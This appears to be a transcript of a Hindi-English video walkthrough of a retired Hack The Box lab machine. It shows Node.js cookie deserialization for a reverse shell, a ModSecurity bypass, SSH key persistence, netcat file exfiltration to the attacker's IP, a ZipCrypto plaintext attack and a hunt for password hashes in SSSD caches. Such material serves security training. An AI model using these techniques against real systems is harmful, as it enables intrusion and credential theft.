हेलो गाइस, वेलकम टू माय न्यू वीडियो। आज की जो वीडियो होने वाली है वो हैक द बॉक्स रिटायर्ड मशीन सेगमेंट के ऊपर होने वाली है। एंड ये काफ़ी एक इंटरेस्टिंग बॉक्स है जिसमें इन्होंने काफ़ी अच्छी तरीके से लिनक्स प्लस विंडोज़ को एक साथ मर्ज किया था एक एडी में। सो प्लीज़ वीडियो को पूरा देखिएगा एंड आई होप आपको इस वीडियो से काफ़ी कुछ सीखने को मिलेगा। तो चलिए वीडियो को शुरू करते हैं। सबसे पहले मैं अपनी फेवरेट कमांड चलाऊंगा nmap -sc -sv -on फॉर आउटपुट फॉर्मेट। नाउ मैं मशीन का आईपी दूंगा जो है 10.10.11.179। ये कमांड मैंने ऑलरेडी रन कर रखी है तो इसका आउटपुट मैं आपको शो कर देता हूँ। मशीन में हमारे पास दो पोर्ट ओपन है, पोर्ट 22 एंड पोर्ट 80। एज यूजल हम अपना एनिमेशन जो है वो पोर्ट 80 के साथ शुरू करेंगे क्योंकि मोस्ट ऑफ द टाइम पोर्ट 22 वनरेबल नहीं होता एंड विदाउट एनी क्रेडेंशियल्स वी कांट डू एनीथिंग ऑन इट। ओके, सो मैं पोर्ट 80 को यहाँ पे ब्राउज करता हूँ। 10.10.11.179। परफेक्ट। तो ये मेरे को रिडायरेक्ट कर रहा है www.windcop.htb पे। तो चलिए मैं इस होस्ट नेम को अपनी etc होस्ट फाइल में ऐड कर लेता हूँ। sudo nano etc होस्ट पासवर्ड। नाउ यहाँ पे मैं मशीन का आईपी डालता हूँ 10.10.11.179 एंड यहाँ पे मैं इसको ऐड कर देता हूँ। परफेक्ट। तो अब मैं इसको ब्राउज करता हूँ और रिफ्रेश करता हूँ। अगेन सेम एरर आ रहा है। तो ये एरर मेरा बग शूट की वजह से आ रहा है। तो यहाँ से मैं प्रॉक्सी को रिमूव करता हूँ, प्रॉक्सी XY, एंड यहाँ से मैं इसको मैनुअल और सिस्टम को प्रॉक्सी पे सेट कर देता हूँ। अब मैं इसको रिफ्रेश करता हूँ। सी, हमारी जो वेबसाइट है वो ओपन हो चुकी है। मैं फायरफॉक्स की विंडो को मैक्सिमाइज कर देता हूँ। नाउ देखने में ये काफ़ी एक स्टैटिक एंड सिंपल वेबसाइट लग रही है जिसमें कि कोई फंक्शनैलिटी एज सच तो नहीं है। वी हैव दिस लिंक्स बट दीज आर एम्प्टी लिंक्स। एंड यहाँ पे भी जो हमको ऑप्शन दिए गए हैं टॉप पे, ये भी सब एक ही पेज पे एंड होते हैं। दैट मीन्स ये सारे जो ऑप्शन हैं ये एक ही पेज में अलग अलग सेक्शन में डिवाइड हो रखे हैं। एंड इनसाइड मोर वी हैव दिस कॉन्टैक्ट, बट कॉन्टैक्ट भी अगेन एक एम्प्टी एंड पॉइंट है, राइट। सो इसमें हम ज़्यादा कुछ कर नहीं सकते। इसके लिए मैं बैकग्राउंड एनिमेशन स्टार्ट करूँगा एंड उसमें सबसे पहले मैं करूँगा subdomain brute force. So for subdomain brute force I'll use wfuzz because I know all the syntax about wfuzz, so that's why I mostly use wfuzz on my hack the box machine, or you can say on my real life pen test as well. So wfuzz -c -u for url। now url है हमारा http 10.10.11.179। यहाँ पे आप होस्ट नेम भी दे सकते हो और यू कैन से दैट डोमेन नेम, बट मेरा एक हैबिट बन गई है कि मैं यहाँ पे आईपी डालता हूँ एंड जो मैं डोमेन नेम है वो स्पेसिफाई करता हूँ होस्ट हेडर पे जहाँ पे मेरे को फर्स्ट करना होता है। सो फर्स्ट windcop डॉट एच टी बी। परफेक्ट। एंड -w फॉर वर्ड लिस्ट ऑफ सेट लिस्ट डिस्कवरी DNS सब डोमेन में भी सब डोमेन या सब डोमेन टॉप 1,05,000.txt। परफेक्ट। अब अब मैं इन रिस्पॉन्स को फिल्टर आउट करता हूँ। उसके लिए मैं यूज़ करूँगा -HL फ्लैग का एंड आई विल फिल्टर आउट ऑल द लाइन्स विद 7। एंड अब ये मेरे को वो सारी लाइन शो नहीं करेगा जिसकी लेंथ जो है वो 7 है, बट वी गॉट अ हिट एंड उसमें जो लाइन्स हैं वो 43 हैं इंस्टेड ऑफ 7। सो दैट्स वाई डब्ल्यू फर्स्ट ने वो हमको डिस्प्ले किया। तो इसको मैं जल्दी से अपनी होस्ट फाइल में ऐड कर देता हूँ। तो sudo nano etc होस्ट एंड यहाँ पे मैं इसको ऐड करता हूँ पोर्टल डॉट विंडकॉप डॉट एच टी बी। परफेक्ट। अब मैं इसको ब्राउज करता हूँ पोर्टल डॉट विंडकॉप डॉट एच टी बी एंड वी हैव वन लॉगिन पेज हेयर। बॉबशूट को भी मैं अपने दूसरे पेन में ओपन कर लेता हूँ। परफेक्ट। ना इसमें मैं लॉगिन होता हूँ एंड इसका जो डिफ़ॉल्ट यूज़र नेम पासवर्ड है वो एडमिन है, जो कि काफ़ी एक सिंपल यूज़र नेम एंड पासवर्ड है। एंड लॉगिन होने के बाद अगेन हमारे पास एक काफ़ी स्टैटिक पेज आता है, राइट। यार वी कैन सी कि यहाँ पे तो कोई भी फंक्शनैलिटी नहीं है अबाउट को छोड़ के, राइट। अबाउट, लॉग आउट एंड होम, बस ये तीन चीज़ें हैं इस वेबसाइट में। तो सबसे पहले मैं इसका वेब फ्रेमवर्क चेक करता हूँ कि इसमें कौन सा वेब फ्रेमवर्क यूज़ हो रहा है। सो आई यूज़ वेब एप्लाइजर फॉर दैट एंड इसकी हेल्प से मुझे पता लग रहा है कि इसमें जो है
एक्सप्रेस यूज़ हो रहा है, एंड बैकएंड पे जो प्रोग्रामिंग लैंग्वेज यूज़ हो रही है वो है नोड जेएस, राइट। सो मैं वापस से अपने बर्बशूट एंड फायरफॉक्स को सेम ही स्क्रीन पे रखता हूँ, एंड इसको मैं रिफ़्रेश करता हूँ, और रिफ़्रेश करते टाइम इंटरसेप्ट को ऑन करता हूँ। एंड रिफ़्रेश करने से पहले मैं प्रॉक्सी को सेट कर लेता हूँ, जो कि मैंने अभी रिमूव करी थी कुछ देर पहले। यहाँ पे मैं मैनुअल प्रॉक्सी को सिलेक्ट करता हूँ, परफेक्ट, एंड यहाँ पे मैं इसको रिफ़्रेश करता हूँ, परफेक्ट। ये रिक्वेस्ट को मैं रिपीटर में सेंड करता हूँ, एंड इसको मैं यहाँ पे सेंड करता हूँ। वी गॉट द रिस्पॉन्स ऑन द रिस्पॉन्स सेक्शन। नाउ वी हैव, मैं इसको एक्सपेंड कर लेता हूँ बॉक्सशूट की विंडो को, एंड विल सी कि हमारे पास एक सीरियलाइज ऑब्जेक्ट है, और यू कैन से सीरियलाइज डेटा है इधर अंडर कुकी, एंड कुकी के अंदर भी एक प्रोफाइल सेक्शन है जिस पे यहाँ पे हमारे पास base64 एक डेटा है, राइट। एंड जब भी मुझे कोई base64 डेटा मिलता है कुकी के अंदर, तो मैं उसको यूजुअली सीरियलाइज्ड ऑब्जेक्ट ही कहता हूँ, बिकॉज जो भी मेरा पास्ट एक्सपीरियंस रहा है विथ नोड जेएस, एक्सप्रेस फ्रेमवर्क एंड पीएचपी बेस्ड फ्रेमवर्क्स जो कि कस्टम बिल्ड होते हैं, उसमें मोस्टली जो कुकी में base64 डेटा जाता है वो बैकएंड पे कहीं ना कहीं डिस्लाइज होता है मोस्ट ऑफ द टाइम। सो दैट्स वाई ये मेरी एक हैबिट बन गई है कि मैं इसको सीरियलाइज ऑब्जेक्ट और यू कैन से सीरियलाइज डेटा कहता हूँ, राइट। बट हर केस में ऐसा नहीं होता, मोस्ट ऑफ द केस में ऐसे होता है। सो जैसे ही मैंने यहाँ इसको हाईलाइट किया, सो अपने साइड पेन में मैं देख सकता हूँ कि ये एक base64 एनकोडेड डेटा है, जिसमें हमारे पास यूज़र नेम है, यूज़र नेम फील्ड है, एंड एडमिन है, उसकी आई गेस ये आईडी है, एंड लॉग ऑन टाइम है आई गेस, जो कि है ईपॉक फॉर्मेट में, करेक्ट। एंड वी हैव दिस कुकी इज ऑल अबाउट ऑथेंटिकेशन एंड परमिशन रिलेटेड थिंग आई गेस। सो लेट्स सी, बट ये जो मेरे को प्रोफाइल सेक्शन लग रहा है, ये मेरे को एक सीरियलाइज ऑब्जेक्ट लग रहा है, तो उसके लिए मैं सिंपल यहाँ पे सर्च करूँगा नोट जेएस सीरियलाइजेशन, I'll also use vulnerability maybe और exploit, let's see, राइट। सो जैसे ही मैंने इसको सर्च किया, सो वी हैव वेरी फर्स्ट लिंक जिसमें इन्होंने ये डिस्क्राइब कर रखा है कि डिजिटलाइजेशन बग को हम कैसे एक्सप्लॉइट करके रिमोट कोड एग्जीक्यूशन ले सकते हैं। लेट्स सी, लेट मी, ओके मैंने ऑलरेडी इस पर क्लिक कर रखा है, बट इट्स टेकिंग स्वीट टाइम। लेट मी चेक द इंटरसेप्ट, इंटरसेप्ट इज ऑल्सो ऑफ। ओके, सो ये जो हमारा विंडो है ये ओपन हो गया। now here also we have same profile section in the blog post also, and ये जो profile section है ये under cookie section है, so it seems very relatable with our situation, right। so यहाँ से हमको एक आइडिया लग जाता है कि probably 90% इसमें एक डीसरियलाइजेशन वर्नेबिलिटी हो सकती है, राइट। जब आप इस ब्लॉग को पूरा पढ़ लोगे तो इसमें ये आपको अच्छी तरीके से समझा देगा कि ये वर्नेबिलिटी है किधर है। एक्चुअली मैं भी इसको थोड़ा सा आपको समझा देता हूँ, एक ओवरव्यू दे देता हूँ। जब भी हम एक डिफ़ॉल्ट पेज पे, और यू कैन से स्लैश, ऐसा पेज जो कि स्लैश पे एंड हो रहा है, फॉर एग्जांपल दिस, जब भी मैं इसको ऐसे हिट करूँगा, सो ये वाला जो फंक्शन है ये एग्जीक्यूट होगा, और उसमें सबसे पहले ये चेक कर रहा है कि कुकी सेक्शन, कुकी इसमें है या नहीं है, राइट। अगर कुकी होगी तो हमारा ये वाला कोड चलेगा, और कुकी नहीं होगी तो ये वाला कोड चलेगा। इस कोड में ये कुकी को असाइन कर रहे हैं, कुकी में भी ये एक स्पेशल चीज़ को चेक कर रहा है जो कि है प्रोफाइल, एंड वी हैव प्रोफाइल हेयर, राइट। तो कुकी में ये एक सब सेक्शन को चेक कर रहा है जो कि है प्रोफाइल, एंड अगर उसमें प्रोफाइल होगा तो ये यहाँ पे उसको अनसीरियलाइज करेगा विदाउट एनी प्रॉपर वैलिडेशन ऑफ दैट सब सेक्शन प्रोफाइल, राइट। तो इस वजह से यहाँ पे ये वर्नेबिलिटी इंट्रोड्यूस होती है। नाउ विल सी कि हम इसको कैसे एक्सप्लॉइट कर सकते हैं, राइट। तो ये हमारे पास ये कुछ प्री डिफाइंड पेलोड्स हैं, बट मैं इनको यूज़ नहीं करूँगा क्योंकि यहाँ पे इन्होंने एक पाइथन की स्क्रिप्ट प्रोवाइड करी है जिसमें हम अपना पेलोड बिल्ड कर सकते हैं, राइट। सो यहाँ से मैं इसको रॉ फॉर्मेट में ले जाके डाउनलोड करता हूँ, परफेक्ट, wget एंड दिस फाइल नेम लिंक, सॉरी। अब मैं इसको रन करता हूँ, सो python 3 node.js shell py, ओके। सो ये जो फाइल बनी है ये python 2 के लिए बनी है। लेट्स सी कि मेरे पास python 2 है या नहीं। आई डोंट हैव python 2, सो उसके लिए मैं इसको कोडियम में ओपन कर लेता हूँ। लेट्स सी,
कि ये कितनी बड़ी फाइल है, इसमें कितने सारे स्टेटमेंट्स हैं जो हमें पाइथन 3 में कन्वर्ट करने हैं. सो इट सीम्स लाइक वेरी स्मॉल स्क्रिप्ट, ओनली 50 लाइन्स ऑफ कोड. अब मैं यहाँ पे जितने भी मेरे प्रिंट स्टेटमेंट है उन सबको ब्रैकेट्स के अंदर रख देता हूँ. 1 is completed. Now we have this as well, and I guess the last one is here. Not the last one, the second last one. Perfect. And here it is, the last one. Later. And अब मैं इसको रन करता हूँ. Let's see. Yes, we can run it now. So हमारा जो लोकल IP है वो है 10.10.14.64 maybe. Let's see. grep 10.10 yeah 1467 एंड पोर्ट में यूज़ करता हूँ 9001. राइट, मैं इसको कॉपी कर लेता हूँ एंड एक फाइल में इसको पेस्ट कर देता हूँ. राइट, अब मैं वापस से उस ब्लॉग पोस्ट में आता हूँ और अगर मैं थोड़ा सा और स्क्रॉल करूँगा तो यहाँ पे इन्होंने बता रखा है कि हमें इस पेलोड को किधर प्लेस करना है. राइट, सो यहाँ से मैं इसको कॉपी कर लेता हूँ एंड यहाँ से मैं इसको इधर पेस्ट कर देता हूँ. इसमें मैं वर्ड रैप को ऑन करता हूँ एंड हमको ये वाला पेलोड पेस्ट करना है अपने सीरियलाइज पेलोड में. राइट, सो यहाँ पे कंट्रोल X फॉर कट एंड यहाँ से मैं इस इवेल से सिलेक्ट करता हूँ इस पेलोड को, सीरियलाइज्ड पेलोड को, एंड यहाँ पे मैं अपना पेलोड पेस्ट कर देता हूँ. अब मैं इसको करता हूँ base64 encode. So this is rc.js maybe. Let's see. cat rc.js. Perfect. base64 minus w0 for one line. इसको यहाँ पे मैं एक्सपेंड करता हूँ एंड वी हैव दिस एज आर पेलोड. अब मैं इसको अपने बबशूट में सब सेक्शन प्रोफाइल के अंदर पेस्ट करता हूँ. राइट, एंड जो मेरा पहले जो प्रोफाइल सेक्शन था उसको रिमूव कर देता हूँ. परफेक्ट, सीम्स गुड. बस यहाँ पे मेरे को लिसनर ओपन करना है. सो rlrep माइनस nc माइनस nlvp 9001. परफेक्ट, अब मैं इसको यहाँ पे सेंड करता हूँ. तो वी गॉट फोरबिडन एरर 403. इसका जो रिस्पॉन्स है मैं ब्राउज़र में देखता हूँ. जो रीज़न आ रहा है 403 का वो ये है कि मॉड सिक्योरिटी ने ब्लॉक कर दिया है हमारे उस रिक्वेस्ट को. एंड मॉड सिक्योरिटी के बारे में थोड़ा आपको एक्सप्लेन करता हूँ. सो बेसिकली मॉड सिक्योरिटी एक वेब एप्लीकेशन फायरवॉल है जो कि वर्क करती है प्री डिफाइंड रूल्स के ऊपर. एंड वो जो रूल्स होते हैं वो सेट ऑफ रूल्स जो होते हैं वो प्री डिफाइंड डेटा और यू कैन से प्री डिफाइंड इंटेलिजेंस के बेसिस पे क्रिएट किए जाते हैं. सो इनको बाईपास करने के काफ़ी सारे मेथड्स हो सकते हैं और पास्ट में हमने देखा है कि काफ़ी सारी फायरवॉल्स जो हैं वो बाईपास हुई हैं. बट एवरी टाइम वी हैव न्यू सिग्नेचर, न्यू रूल्स एंड न्यू बाईपासेस. राइट, सो अभी हमको इसका बाईपास देखना है. सो जैसे ही यहाँ पे मैं सर्च करूँगा सेक्जूस मॉड सिक्योरिटी बाईपास. सो वी हैव दिस CV 2019-19-886. इसमें इन्होंने काफ़ी अच्छे से एक्सप्लेन किया है कि किस तरीके से हम मॉड सिक्योरिटी की जो फायरवॉल है उसको बाईपास कर सकते हैं, जो कि लीड करता है हमें SQL इंजेक्शन, क्रॉस साइट स्क्रिप्टिंग एंड इवन डॉस वर्नेबिलिटी तक. ओके, सो मैं इसको थोड़ा नीचे स्क्रॉल करता हूँ ब्लॉक को एंड हेयर वी हैव द बाईपास. राइट, इसको मैं आपको एक्सप्लेन करता हूँ अभी. So let's see. The thing is we have profile and we have some base64 data. Right, so base64 data. इसमें जो प्रोफाइल है वो है कुकी वैल्यू, आई गेस कुकी नेम. या तो जो हमारा प्रोफाइल है वो है कुकी नेम एंड जो base64 डेटा है वो है हमारी कुकी वैल्यू. राइट, अब यहाँ पे जो कुकी पार्सर यूज़ हुआ है वो कुकी पार्सर एक एप्लीकेशन है जो कुकी को इस तरीके से पार्स करेगा जिस तरीके से हमारा वेब एप्लीकेशन बैक एंड में उसको पार्स करता है. राइट, सो यहाँ पे हम उस सिनेरियो को रिपीट कर रहे हैं जो कि तब परफॉर्म होगा जब हम कुकी को सेंड करेंगे वेब सर्वर पे एंड उस टाइम पे वो कुकी को इंटरसेप्ट करेगा. राइट,
तो यहाँ पे सिनेरियो ये है कि अगर हम इसमें एक वैल्यू प्रोवाइड कर रहे हैं तो बैकएंड सर्वर जो है वो उसको अच्छे से इंटरसेप्ट कर रहा है, इंटरप्रेट कर रहा है, राइट। बट अगर हम दो वैल्यू प्रोवाइड करें विथ स्प्लिट ऑफ इक्वल टू साइन, सो लेट्स सी फू बार। नाउ देखने में ये काफ़ी एक सिंपल चीज़ लग रही है, बट अब जो प्रोफाइल कुकी के अंदर वैल्यू जाएगी वो ये वैल्यू जाएगी, राइट। एंड इस पूरी वैल्यू को हमारा बैकएंड सर्वर जो है वो इंटरप्रेट करेगा एंड इसको अनसीरियलाइज करेगा हम इस केस में, राइट। बट नॉर्मली ये अनसीरियलाइज हो या ना हो ये फंक्शनलिटी पे डिपेंड करता है, बट ये क्लियर है कि अब ये पूरी वैल्यू जाएगी जो कि ऐसा नहीं जाना चाहिए था। सो इसी बिहेवियर की वजह से हम इस बार सेक्शन पे और यू कैन से इस फू सेक्शन पे एसक्यूएल इंजेक्शन परफॉर्म कर सकते हैं और एक्सरसाइज भी परफॉर्म कर सकते हैं। अगर हम स्पेशल करेक्टर इनपुट करें तो वी कैन लीड टू डॉस एज वेल, राइट। सो अब यही सेम चीज़ मैं यहाँ पे परफॉर्म करूँगा एंड उस चीज़ के लिए सबसे पहले मेरे को अपने पेलोड में से इन इक्वल टूज को रिमूव करना होगा। उस चीज़ के लिए मैं वापस से अपने कोडियम पे आता हूँ एंड इसको यहाँ पे मैक्सिमाइज करता हूँ एंड यहाँ पे मैं कुछ स्पेसेस प्रोवाइड करता हूँ, राइट। मैंने यहाँ पे 2 स्पेसेस दिए हैं। अब मैं दोबारा से इसको बेस 64 एनकोड करता हूँ। लेट्स सी नाउ वी रिमूव्ड द इक्वल टू साइंस, राइट। अब यहाँ पे मैं कंट्रोल Z करूँगा फॉर गेटिंग बैक माई ओरिजिनल प्रोफाइल सेक्शन। अब इसको मैं यहाँ से रिमूव करता हूँ एंड यहाँ पे अपना न्यू पेलोड पेस्ट करता हूँ और यहाँ पे मैं इस रिक्वेस्ट को सेंड करता हूँ। लेट्स सी, सो वी गॉट द हिट, राइट, परफेक्ट। अब मैं इस शेल को प्रॉपर TTY शेल में कन्वर्ट करता हूँ। तो पाइथन 3 -c import pty dot spawn and bin bash perfect. सो वी हैव दिस शेल, राइट। अब सबसे पहले मैं यूज़र की होम डायरेक्टरी में जाता हूँ, क्योंकि मैंने यूज़र इसलिए बोला क्योंकि यहाँ पे मेरे को www डेटा शो नहीं हुआ। सो दैट्स वाई आई अज्यूम दैट वेस्टर इज़ ऑलरेडी एन यूज़र एंड यहाँ पे मैं एक SSH की को ड्रॉप करता हूँ एंड वी कैन सी कि यूज़र की होम डायरेक्टरी में एक बैकअप डॉट जिप फाइल भी है। तो इसको हम फर्दर एनालाइज करेंगे। अभी सबसे पहले जो हमारा काम है हम इसमें SSH की को पुट करते हैं, राइट। सो CD SSH, परफेक्ट। एंड यहाँ से मैं ऑथराइज्ड की को रिमूव करता हूँ और रिमूव करने की जगह मैं इसी में अपेंड कर दूंगा, राइट। तो कैट SSH IDRSA डॉट पब। अब मैं इस की को यहाँ पे कॉपी करता हूँ एंड यहाँ पे ऑथराइज्ड की में सेंड कर देता हूँ एको, परफेक्ट, ऑथराइज्ड कीज, परफेक्ट। अब मैं यहाँ पे SSH सेशन लेने के लिए ट्राई करता हूँ वेस्टर विंडकॉप और पोर्टल विंडकॉप, परफेक्ट, यस, लेट्स सी। सो वी गॉट अ SSH सेशन। यहाँ से मैं इस सेशन को डिस्ट्रॉय करता हूँ एंड यहाँ पे मैं एक डायरेक्टरी बना लेता हूँ ट्रांसफ़र, क्योंकि अभी हमने देखा था कि यूज़र की होम डायरेक्टरी में बैकअप डॉट जिप फाइल थी। इसको मैं अपनी मशीन में कॉपी करता हूँ। तो उसके लिए मैं यूज़ करूँगा नेटकट का nc-nlvp 9001 बैकअप डॉट जिप, परफेक्ट, nc 10 10 14 67 बैकअप डॉट जिप, perfect. Okay, so we didn't provide the port number, सिली मिस्टेक, कोई दिक्कत नहीं। हमारा जो सेशन है वो कनेक्ट हो गया। अब मैं चेक करता हूँ कि ये फाइल अभी भी ट्रांसफ़र हो रही है या नहीं। एंड उसको चेक करने का सबसे अच्छा तरीका है, जो यहाँ पे इसका साइज़ है वो अगर इंक्रीज़ हो रहा है दैट मीन्स कि अभी भी जो फाइल है वो ट्रांसफ़र मोड में है एंड अभी तक वो पूरी तरीके से ट्रांसफ़र नहीं हुई है। बट वी कैन सी हेयर कि हमारी फाइल का जो साइज़ है वो एक स्टेबल साइज़ है, राइट। सो उसका मतलब है कि हमारी जो फाइल है वो ट्रांसफ़र हो चुकी है कंप्लीट। अब मैं इसको ट्रांसफ़र फोल्डर में मूव कर देता हूँ, परफेक्ट। एंड यहाँ इसको अनजिप करता हूँ, अनजिप -d बैकअप डॉट जिप एंड बैकअप, ओके, लाइक दिस, ओके। सो जो जिप फाइल है वो पासवर्ड के लिए
आस्क कर रही है, लेट्स सी। अगर हमने इसमें एम्प्टी पासवर्ड पुट किया, सो वी अनजिप द फाइल, बट आई डोंट थिंक कि वी हैव सम टेक्स्ट फाइल्स और डेटा इज इनसाइड दिस फोल्डर। सो यू कैन सी कि हमारे पास कोई भी डेटा नहीं है, राइट। मैंने ऐसा इसलिए कहा क्योंकि अगर मैं इसको अनजिप एल से लिस्ट करूं बैकअप डॉट जिप फाइल को, सो सी वी हैव सो मैनी फाइल्स, राइट। अगर यहाँ पे मैं काउंटिंग भी देखूं तो हमारे पास 40 फाइल्स हैं, राइट। एंड हेयर let me go to back on this backup directory, एंड यहाँ पे अगर मैं फाइंड पीरियड करूँ और उसके बाद लाइन काउंट करूँ तो वो 25 लाइन्स ही हैं, राइट। एंड 25 की 25 फोल्डर्स जो हैं उनमें एम्प्टी डेटा है। सो वापस से मैं बैकअप डॉट जिप को एनालाइज करता हूँ, एंड सबसे पहले मैं इसका मेथड चेक करूँगा कि इसमें कौन सा मेथड यूज़ हुआ है इसको जिप करने के लिए, राइट। क्योंकि ये मेरे को लग रही है इनक्रिप्टेड देन जिप फाइल, राइट। सो 7ZL माइनस LT मे बी, आई एम नॉट श्योर अबाउट द फ्लैग्स बट लेट्स सी, या द फ्लैग्स आर करेक्ट। एंड वी कैन सी कि यहाँ पे जिप क्रिप्टो मेथड का यूज़ हुआ है इसको इनक्रिप्ट करने के लिए, राइट। सो जिप क्रिप्टो में हमारे पास एक काफ़ी नोन वर्नेबिलिटी है जिसका नाम है जिप क्रिप्टो प्लेन टेक्स्ट अटैक। सो वही हम अभी परफॉर्म करेंगे एंड उसकी हेल्प से इसको क्रैक करेंगे, राइट। सो प्लेन टेक्स्ट अटैक परफॉर्म करने के लिए मुझे बी क्रैक को डाउनलोड करना होगा, बी क्रैक गिटहब, एंड यहाँ से मैं इसको डाउनलोड कर लेता हूँ, लिनक्स स्टार। अब डाउनलोड करने के बाद मैं इसको अपने ट्रांसफ़र फोल्डर में मूव कर लेता हूँ, डाउनलोड बी क्रैक हेयर। अब इसको अनजिप करता हूँ tar xvzf एंड बी क्रैक, परफेक्ट। इस tar फाइल को रिमूव कर देता हूँ मैं, बी क्रैक डॉट tar gz, यस। नाउ मैं बी क्रैक फोल्डर के अंदर जाता हूँ, परफेक्ट, एंड इसको रन करता हूँ। तो फॉर हेल्प मेन्यू वी हैव टू टाइप -h, perfect, and we have these many options, right, but we only want these 4 options to be work. So सबसे पहले हमको चाहिए होगी एक प्लेन टेक्स्ट की या फिर प्लेन टेक्स्ट कुछ बाइट्स ऑफ प्लेन टेक्स्ट जो कि जिप आर्काइव हुई है इस जिप के अंदर। सो इसको मैं बेटर एक्सप्लेन करने के लिए अपना पेंट ओपन करता हूँ। सो हमारे पास जो जिप फाइल है वो ये है, राइट। हमको इसको अनजिप करने के लिए एक फाइल चाहिए होगी जो कि ऑलरेडी इस जिप फाइल के अंदर है, राइट। वही फाइल हमको प्लेन टेक्स्ट में चाहिए, राइट। सो उसके लिए मैं इसमें फाइल लिस्टिंग करूँगा अपनी बैकअप डॉट जिप फाइल में, अनजिप -l बैकअप डॉट जिप, एंड वी कैन सी कि हमारे पास etc पासवर्ड फाइल है जो कि इसमें जिप हो रखी है। तो इस etc पासवर्ड फाइल को मैं डायरेक्ट डाउनलोड करके उसको एज अ प्लेन टेक्स्ट फाइल यूज़ कर सकता हूँ, राइट। सो उस चीज़ के लिए मैं इस etc पासवर्ड को डाउनलोड करूँगा। एंड वन मोर थिंग, मैं इस पासवर्ड फाइल को डाउनलोड ही क्यों करूँगा, कॉपी भी तो कर सकता था, करेक्ट। बट ये मैं आपको चीज़ अभी शो करूँगा कि मैंने इसको डाउनलोड ही क्यों किया। मैं पहले इसको एक बार डाउनलोड कर लेता हूँ। सो NC NLVP 9001 एंड पासवर्ड, सो NC 10 10 14 67 9001 देन etc पासवर्ड, परफेक्ट। सो हमारा जो ट्रांसफ़र है वो कंप्लीट हो गया होगा क्योंकि etc पासवर्ड फाइल इतनी बड़ी नहीं होती। अब मैं इस फाइल को एक बार जिप करता हूँ, देन आई विल टेल यू कि वाई आई डाउनलोडेड दिस फाइल, राइट। पासवर्ड डॉट जिप मे बी, लेट्स सी, आई एम नॉट श्योर कि जो फाइल नेम है वो पहले आएगा या बाद में। ओके, सो पासवर्ड डॉट जिप इधर आएगा एंड पासवर्ड इधर आएगा। ओके, सो आई हैव टू यूज़ जिप नॉट अनजिप, परफेक्ट। तो यहाँ पे मैंने पासवर्ड फाइल को पासवर्ड डॉट जिप में कन्वर्ट कर दिया। अब मैं इसका CRC बिट चेक करता हूँ, राइट। सो 7ZL -SLT पासवर्ड जिप। अगर यहाँ पे आप इसका CRC चेक करें तो CRC की जो वैल्यू है वो है D00EE74, राइट। अब CRC चेक करते हैं हम बैकअप डॉट जिप फाइल का, एंड उसमें भी प्राइमरली
अपनी ETC पासवर्ड फाइल का, जो कि है टॉप पे। एंड हेयर इज ETC पासवर्ड फाइल, एंड इसका CRC बिट भी है D003374, राइट। अगर यही चीज़ को मैं कॉपी करके जिप में कन्वर्ट करता तो इसका CRC बिट कुछ आता, ABD करके कुछ, राइट। सो वी नीड CRC बिट सेम, सो दैट्स वाई आई डाउनलोडेड दैट फाइल। अब मैं बी क्रैक को रन करता हूँ। तो बी क्रैक -C फॉर साइफर बैकअप जिप फाइल। सो उसके लिए हमारा बैकअप डॉट जिप फाइल यूज़ होगा। देन c वो फाइल जो कि इनक्रिप्ट, जो कि जिप के अंदर है, बट उस वही फाइल हमारे पास प्लेन टेक्स्ट में भी है। सो हमारे इस केस में वो है ETC पासवर्ड। एंड आई एम नॉट श्योर अबाउट कैपिटल P और स्मॉल p, लेट मी सी if that help is on my pen. Yeah, here it is. So small p जो है वो प्लेन फाइल के लिए यूज़ होगा, तो स्मॉल p इज़ फॉर पासवर्ड, एंड कैपिटल P यूज़ होगा पासवर्ड जिप के लिए। परफेक्ट। तो यहाँ से बी क्रैक जो है वो हमको की कैलकुलेट करके देगा, एंड विद द हेल्प ऑफ दैट की वी कैन सेट न्यू पासवर्ड। तो हमारी की जो है वो कैलकुलेट हो चुकी है, तो इसका यूज़ करके अब हम एक नया पासवर्ड सेट करते हैं। तो उसके लिए मैं अगेन बी क्रैक को यूज़ करूँगा, लाइक दिस, बी क्रैक -C फॉर बैकअप डॉट जिप फाइल, एंड -U for output.zip. So I'll say crack backup.zip, and the for key I have to use -K, then new password. So please subscribe. आई थिंक -U को हमको यहाँ पे यूज़ करना चाहिए, क्योंकि वो की के साथ मिक्स ना हो जाए हमारा जो पासवर्ड है। सो -U फॉर क्रैक बैकअप डॉट जिप। परफेक्ट। सो हमारी नई फाइल क्रिएट हो चुकी है। अब मैं इसको अनजिप करता हूँ, अनजिप -D क्रैक बैकअप, देन क्रैक बैकअप डॉट जिप। परफेक्ट। एंड जो हमारा पासवर्ड है वो है प्लीज़ सब्सक्राइब, पासवर्ड इज़ इनकरेक्ट, लेट्स सी। इसको यहाँ से मैं कॉपी करता हूँ एंड यहाँ पे पेस्ट करता हूँ। परफेक्ट। तो हमने जिप फाइल को क्रैक कर लिया है। अब इसको एनालाइज करते हैं कि इसके अंदर क्या है। तो फाइंड डॉट, एंड वी हैव SS फाइल्स एंड SSD फाइल्स। SSD आई गेस एक बाइनरी है जिसकी हेल्प से हम अपनी लिनक्स मशीन को एक डोमेन में ऐड कर सकते हैं। तो वो सारी चीज़ें जो परफॉर्म करते हैं वो हम SSD की हेल्प से परफॉर्म करते हैं। सो लेट मी रीड द कॉन्फ़िग फाइल ऑफ SSD. It's empty here. So SSD conf is there. Okay, SSD conf फाइल को रीड करता हूँ मैं, SSD conf. So see, all the Kerberos related thing is here, right? Okay, other than this file we have some LDB files as well. दोबारा से find डॉट करता हूँ, एंड सी वी हैव सम LDB फाइल। सो मैं सिंपल सर्च करूँगा फॉर grep -IR। आई एम नॉट श्योर कि स्मॉल आर आएगा या कैपिटल, बट लेट्स सी। पासवर्ड एंड ओके। सो ये LDB फाइल्स जो हैं ये हमारी बाइनरी फाइल्स हैं। इनको ओके, सो इनको मैं रीड करता हूँ यूजिंग स्ट्रिंग var, नॉट लाइक दिस, cd var lib sss then db। here are all the LDB files. So strings asterisk for wildcard grep -I password. So we have these many password instances. So मैं यहाँ पे यूज़ करूँगा -A, ताकि ये मेरे को आफ्टर पासवर्ड के जो बाद की 4 लाइन है वो शो करे, और -V तो पासवर्ड के पहले की 4 लाइन थे वो शो करे। एंड हियर वी हैव वन हैश जो कि है रे डंकन का। सो इस हैश को मैं क्रैक करता हूँ,
